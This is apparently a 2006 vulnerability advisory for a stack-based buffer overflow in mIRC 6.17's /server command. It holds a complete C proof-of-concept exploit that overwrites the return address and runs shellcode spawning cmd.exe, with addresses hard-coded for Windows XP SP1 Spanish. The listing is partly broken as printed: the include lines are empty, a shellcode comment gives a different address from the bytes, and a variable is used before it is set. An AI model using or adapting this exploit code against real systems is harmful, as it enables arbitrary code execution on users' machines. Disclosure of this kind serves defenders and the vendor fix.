- 1 - Introduction

Written by Khaled Mardam-Bey, mIRC is a popular IRC client for Windows that is well equipped with options and scripting tools.

- 2 - Vulnerability description

Affected: mIRC 6.17 and earlier. Issuing the /server command with an overly long argument does not crash mIRC the first time. When the same text is entered again, the code that updates the stored server information copies it without checking its length, and mIRC crashes with the saved return address (EIP) overwritten by attacker-controlled data, i.e. a stack-based buffer overflow. The impact is limited: the PoC below drives the mIRC status-window edit control from another process with WM_SETTEXT / WM_IME_KEYDOWN, so the attacker already needs to be running code as the user who runs mIRC, and any payload executes with that same user's privileges. It is a minor bug and DOES NOT ELEVATE PRIVILEGES.

- 3 - How to exploit it

This PoC makes mIRC spawn cmd.exe; any other payload could be substituted. `$str(A,352)` and `$+` are mIRC script identifiers evaluated by mIRC itself, so the padding is expanded inside mIRC, and `|` separates two commands on one line: the same /server line is executed twice in one go, which is what triggers the unchecked copy on the second pass.

Notes for anyone reading or rebuilding the listing:
(a) The three #include lines lost their header names when this page was extracted. From the APIs used (HWND, FindWindow/FindWindowEx/SendMessage, printf, strcat) the program needs at least <windows.h>, <stdio.h> and <string.h>.
(b) Every address is hard-coded for Windows XP SP1 Spanish: the return-address overwrite 0x77D8FAF0 at the start of saltaoffset (followed by what appears to be a sub esp,0x74 / jmp esp stub) and the address loaded into EBX and called by the shellcode. The PoC will not work on any other build or language of Windows without re-deriving these.
(c) The shellcode comment gives the address of system() as 0x77c293c7, but the bytes actually loaded into EBX (`\xBB\x44\x80\xbf\x77`) encode 0x77bf8044 -- one of the two is stale; verify against the target before use.
(d) SetForegroundWindow(lHandle) is called before lHandle is assigned, which reads an uninitialized variable (undefined behaviour); that call belongs after the FindWindowEx chain has succeeded. strClass is declared but never used.

----------- mircServerexploitXPSP1.c ----------------------

/* This PoC it's for XP SP1 Spanish */
#include
#include
#include

int main () {
    HWND lHandle;
    char command[512]= "http://server -a $str(A,352) $+ ";
    char command2[512]=" $+ $str(A,56) $+ ";
    char command3[512]=" $+ $str(B,52) ";
    char finalcommand[1024]="";
    char strClass[30];
    char shellcode[999]= "\x55" "\x8B\xEC" "\x33\xFF" "\x57" "\x83\xEC\x04" "\xC6\x45\xF8\x63" "\xC6\x45\xF9\x6D" "\xC6\x45\xFA\x64" "\xC6\x45\xFB\x2E" "\xC6\x45\xFC\x65" "\xC6\x45\xFD\x78" "\xC6\x45\xFE\x65" "\x8D\x45\xF8" "\x50" "\xBB\x44\x80\xbf\x77" "\xFF\xD3" "\x90\x90\xFF\xE1";
    //Shellcode system("cmd.exe"), system in \xc7\x93\xc2\x77 0x77c293c7 (WinXP Sp1 Spanish)
    char saltaoffset[]="\xF0\xFA\xD8\x77\x90\x90\x90\x90\x90\x83\xEC\x74\xFF\xE4\x90\x90"; // 0x77D8FAF0

    SetForegroundWindow(lHandle);
    lHandle = FindWindowEx(FindWindowEx(FindWindowEx(FindWindow("mIRC",NULL), 0, "MDIClient", 0),0, "mIRC_Status", 0), 0, "Edit", 0);
    if (!lHandle) {
        printf("Can't find mIRC\n");
        return 0;
    }

    strcat(shellcode,command2);
    strcat(shellcode,saltaoffset);
    strcat(command,shellcode);
    strcat(command,command3);
    strcat(finalcommand,command);
    strcat(finalcommand,"| ");
    strcat(finalcommand,command);
    printf("%s\n", finalcommand);

    SendMessage(lHandle, WM_SETTEXT,0,(LPARAM)finalcommand);
    SendMessage (lHandle, WM_IME_KEYDOWN, VK_RETURN, 0);
}
/* Eof */

----------- CUT HERE ----------------------

- 4 - Solution

Fixed in mIRC 6.2; upgrade to 6.2 or later.
Download: http://www.mirc.com/get.html

- 5 - Credits

Vendor URL: www.mirc.com
Author: Jordi Corrales ( crowdat[at]gmail.com )
Date: 02/08/2006